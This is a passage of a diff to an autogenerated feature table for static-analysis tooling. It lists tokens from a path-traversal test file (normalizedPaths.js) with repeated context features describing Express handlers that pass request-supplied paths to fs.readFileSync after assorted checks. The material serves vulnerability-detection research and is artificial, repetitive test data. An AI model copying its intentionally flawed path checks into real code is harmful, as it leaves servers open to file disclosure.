workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:264:5:264:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:264:5:264:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:264:5:264:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:264:5:264:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:264:5:264:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:264:5:264:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:264:5:264:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:264:8:264:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:264:8:264:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:264:8:264:19 | readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:264:8:264:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:264:8:264:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:264:21:264:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:264:21:264:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:264:21:264:24 | path | calleeImports | fs | @@ -9006,6 +76499,46 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:264:21:264:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:264:21:264:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:264:21:264:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:267:7:267:13 | newpath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:267:7:267:13 | newpath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:267:7:267:13 | newpath | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:267:7:267:13 | newpath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:267:7:267:13 | newpath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:267:7:267:42 | newpath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:267:7:267:42 | newpath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:267:7:267:42 | newpath | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:267:7:267:42 | newpath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:267:7:267:42 | newpath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:267:7:267:42 | newpath ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:267:7:267:42 | newpath ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:267:7:267:42 | newpath ... e(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:267:7:267:42 | newpath ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:267:7:267:42 | newpath ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:267:17:267:26 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:267:17:267:26 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:267:17:267:26 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:267:17:267:26 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:267:17:267:26 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:267:17:267:36 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:267:17:267:36 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:267:17:267:36 | pathModule.normalize | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:267:17:267:36 | pathModule.normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:267:17:267:36 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:267:17:267:42 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:267:17:267:42 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:267:17:267:42 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:267:17:267:42 | exceptional return of pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:267:17:267:42 | exceptional return of pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:267:17:267:42 | pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:267:17:267:42 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:267:17:267:42 | pathMod ... e(path) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:267:17:267:42 | pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:267:17:267:42 | pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:267:28:267:36 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:267:28:267:36 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:267:28:267:36 | normalize | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:267:28:267:36 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:267:28:267:36 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:267:38:267:41 | path | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/normalizedPaths.js:267:38:267:41 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:267:38:267:41 | path | calleeImports | path | @@ -9015,6 +76548,61 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:267:38:267:41 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:267:38:267:41 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:267:38:267:41 | path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:268:7:268:18 | relativePath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:268:7:268:18 | relativePath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:268:7:268:18 | relativePath | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:268:7:268:18 | relativePath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:268:7:268:18 | relativePath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:268:7:268:85 | relativ ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:268:7:268:85 | relativ ... ewpath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:268:7:268:85 | relativ ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:268:7:268:85 | relativ ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:268:7:268:85 | relativ ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:268:7:268:85 | relativePath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:268:7:268:85 | relativePath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:268:7:268:85 | relativePath | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:268:7:268:85 | relativePath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:268:7:268:85 | relativePath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:268:22:268:31 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:268:22:268:31 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:268:22:268:31 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:268:22:268:31 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:268:22:268:31 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:268:22:268:40 | pathModule.relative | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:268:22:268:40 | pathModule.relative | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:268:22:268:40 | pathModule.relative | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:268:22:268:40 | pathModule.relative | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:268:22:268:40 | pathModule.relative | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:268:22:268:85 | exceptional return of pathMod ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:268:22:268:85 | exceptional return of pathMod ... ewpath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:268:22:268:85 | exceptional return of pathMod ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:268:22:268:85 | exceptional return of pathMod ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:268:22:268:85 | exceptional return of pathMod ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:268:22:268:85 | pathMod ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:268:22:268:85 | pathMod ... ewpath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:268:22:268:85 | pathMod ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:268:22:268:85 | pathMod ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:268:22:268:85 | pathMod ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:268:33:268:40 | relative | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:268:33:268:40 | relative | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:268:33:268:40 | relative | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:268:33:268:40 | relative | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:268:33:268:40 | relative | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:268:42:268:51 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:268:42:268:51 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:268:42:268:51 | pathModule | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:268:42:268:51 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:268:42:268:51 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:268:42:268:61 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:268:42:268:61 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:268:42:268:61 | pathModule.normalize | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:268:42:268:61 | pathModule.normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:268:42:268:61 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:268:42:268:75 | 